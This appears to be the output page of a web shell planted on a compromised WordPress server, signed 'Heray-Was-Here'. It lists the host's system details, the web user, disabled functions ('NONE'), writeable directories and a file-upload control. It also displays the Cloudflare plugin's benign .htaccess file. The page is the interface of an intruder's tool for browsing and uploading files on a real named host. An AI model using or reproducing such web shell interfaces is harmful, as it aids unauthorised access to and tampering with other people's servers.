Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/store/wp-content/plugins/cloudflare/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/store/wp-content/plugins/cloudflare/.htaccess
# Restricts direct access to files that are not intended to be publicly available

# Apache 2.2
<IfModule !mod_authz_core.c>
        Order Deny,Allow
        Deny from all
</IfModule>

# Apache 2.4
<IfModule mod_authz_core.c>
        Require all denied
</IfModule>


# Allows direct access to specific files only

# Cloudflare JS and CSS
<FilesMatch "^.+(js|css)$">
        # Apache 2.2
        <IfModule !mod_authz_core.c>
                Allow from all
        </IfModule>

        # Apache 2.4
        <IfModule mod_authz_core.c>
                Require all granted
        </IfModule>
</FilesMatch>

# Cloudflare images
<FilesMatch "^.+(png|svg|gif|jpg|webp)$">
        # Apache 2.2
        <IfModule !mod_authz_core.c>
                Allow from all
        </IfModule>

        # Apache 2.4
        <IfModule mod_authz_core.c>
                Require all granted
        </IfModule>
</FilesMatch>

# Cloudflare fonts
<FilesMatch "^.+(eot|ttf||otf|woff|woff2)$">
        # Apache 2.2
        <IfModule !mod_authz_core.c>
                Allow from all
        </IfModule>

        # Apache 2.4
        <IfModule mod_authz_core.c>
                Require all granted
        </IfModule>
</FilesMatch>

Hry